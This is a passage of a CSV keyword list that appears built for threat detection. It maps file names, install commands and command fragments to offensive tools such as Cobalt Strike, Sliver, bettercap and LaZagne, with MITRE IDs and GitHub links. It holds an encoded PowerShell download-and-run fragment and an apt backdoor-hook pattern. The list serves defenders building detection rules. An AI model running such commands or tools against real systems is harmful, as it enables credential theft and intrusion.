- TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*APIHookInjectorBin.exe*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.log*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.pdb*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*APIHookInjectorBin.sln*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*apokryptein/secinject*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*apop2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*appdata*\Windows:svchost.exe*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*appdata*\Windows:winrm.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*AppData\Roaming\uTorrent*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*applenotes2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Applet_ReverseTCP.jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Application.Lazagne.H*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*applocker_enum*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*applocker-enumerator*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*apt install crunch*","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*apt install gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*apt install hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*apt install polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*apt install set -y*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*apt install wce*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" +"*APT stands for Advanced Persistence Tomato*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*apt* install john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*apt/etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*apt/putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*APT::Update::Pre-Invoke *}*","greyware_tool_keyword","APT","linux commands abused by attackers - backdoor apt execute a command when invoking apt","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*apt1_virtuallythere.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*APT64/EternalHushFramework*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*apt-get -y install tor *","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*APTortellini/unDefender*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"*APTSimulator*","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is deisgned to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2271","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" +"*apypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" +"*aquatone*","offensive_tool_keyword","aquatone","Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.","T1590 - T1553 - T1002 - T1083 - T1313","TA0009 - TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/michenriksen/aquatone","1","0","N/A","N/A","10","5266","876","2022-05-22T19:49:32Z","2015-11-19T11:30:12Z" +"*archerysec*","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2135","507","2023-10-04T02:00:32Z","2017-12-04T12:42:54Z" +"*archive-*.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ArchStrike*","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ares.py runserver*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*ares-master.zip*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*Args_Invoke_Kerberoast*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*armitage.exe*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" +"*armory install *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-execute*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install .net-recon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install situational-awareness*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Arno0x/DBC2*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Arno0x/EmbedInHTML*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*Arno0x/WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp_mitm.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoofing.py *","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" +"*arsenal_kit.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 